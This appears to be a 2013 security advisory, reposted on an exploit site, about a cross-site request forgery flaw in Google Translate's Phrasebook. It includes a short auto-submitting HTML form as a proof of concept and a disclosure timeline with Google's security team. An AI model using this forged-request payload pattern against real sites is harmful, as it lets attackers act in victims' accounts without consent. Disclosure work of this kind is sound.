Google Translate Cross Site Request Forgery

Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

+------------------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Google Translate CSRF Vulnerability # Date : 06/20/2013 # Author : Ivano Binetti ( # Affected Web site : # Original Advisory: : # Updates : +------------------------------------------------------------------------------------------------------------------------------------------+ Summary 1)Vulnerability Description 2)Exploit 3)Vulnerability Timeline +------------------------------------------------------------------------------------------------------------------------------------------+ 1)Vulnerability Description I discovered a new CSRF vulnerability on web site which could allow an attacker to insert items (Words/Phrases/Urls and related translations) into the user's Phrasebook. Furthermore an attacker could also inserta potentially malicious Urls - into the above mentioned Phrasebook - towards which the victim could be redirected simply clicking on the "Go to <website>" right-click option on The vulnerability is related to a problem into the generation of the "xt" anti-CSRF token which is not correctly associated with the user session, allowing to use any previous generated anti-CSRF parameter - for that specific user- in order to carry out this attack. 2)Exploit Following a simply exploit in order to insert, into a Phrasebook, the new phrase "word_example" and the url "" (my blog) as translation: <html> <body onload="javascript:document.forms[0].submit()"> <form method="POST" name="form0" action="<anti-CSRF token"> <input type="hidden" name="q" value="word_example"/> <input type="hidden" name="utrans" value=""/> </form> </body> </html> Note: executing the exploit the victim will receive the message to open or download a "sg" file. Even if the victim does not open or download this file the new item will be added into the Phrasebook. 3)Vulnerability Timeline 04/12/2013: Exploit has been sent to Google security team ( 04/12/2013: First prompt reply from Google security team telling me that the exploit does not work 04/12/2013: My reply explaining the details of the vulnerability and related exploit 04/13/2013: Google security team contacted me admitting the vulnerability and that they were considering if assign me a reward 04/17/2013: Google security team told me that the vulnerability/problem was already known by Google and that no reward there would been for me :( 06/20/2013: After more than 2 months I checked that the problem is still in place, so I decided to publish the vulnerability 08/15/2013: Google Security team contacted me in order to inform me that the vulnerability has been fixed and to ask me to check if the vulnerability was correctly fixed. 09/01/2013: I've tested the vulnerability and - unfortunely - I've verified that it still affects Google translate. I've written an email to Google Security team in order to inform them that the issue was not correctly patched and to share the results of my tests.


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top